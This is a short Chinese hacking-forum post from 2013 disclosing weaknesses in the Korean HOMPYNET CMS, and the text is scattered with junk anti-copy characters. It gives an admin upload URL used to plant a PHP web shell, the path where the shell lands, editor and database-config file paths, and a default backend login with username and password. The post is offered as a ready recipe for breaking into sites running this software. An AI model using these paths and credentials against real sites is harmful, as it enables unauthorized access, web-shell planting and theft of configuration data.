找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2193|回复: 0
打印 上一主题 下一主题

韩国HOMPYNET CMS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:12:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
上传漏洞  :! d7 w! T7 a, ~$ k; K: J
1 T  {  _+ }% O; {, m' k& S
http://www.xxx.com/admin/image_a ... p;iname=&iform=3 }5 Z( R3 e& D! T

9 R% U- m: z. ]" u+ ?' b: xhttp://www.xxx.com/admin/image_a ... p;iname=&iform=
5 H! F4 k' J: j6 [9 [. l3 z! [
' E) |+ Y: u& A9 }/ i% S8 U+ W上传后路径:+ b* J& k# E8 X

9 \( _, P7 c2 Y4 v5 x" K# i: nhttp://www.xxx.com/bis_web_page/images/shell.php.en
. ^( a, J9 u9 m: `# u, q: i, ^) G9 I* f$ X1 s6 A
编辑器:
- O% Q: x# K2 t3 c% q! s" m
: A; ?& F% g- Q4 o" O0 F& uhttp://www.xxx.com/admin/editor/SWE.php
6 |+ M4 D$ @. t2 n% \' _4 k- i: I# U! V& s1 C. Q( r7 F4 ]0 g; P
http://www.xxx.com/program/editor/SWE.php* C, S: {7 B! Q) v' d* {0 K2 W

0 J+ R- V) j5 [% x9 M数据配置文件路径:
2 P9 e/ X, {( f  V' u3 t+ d) }/ V7 i! Q
http://www.xxx.com/m_config/DATA/g_setting.php; ?! K+ @2 ?3 [: c! n
6 T+ @1 Y& A. `7 n9 F  ]" H
此程序通用后台账号 :gamsiw  php99
, l$ A# T  k  k. X% h$ V% ]8 M( j9 k
. E1 n" F" J8 P

- B( q; w- S- `: @9 B$ |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表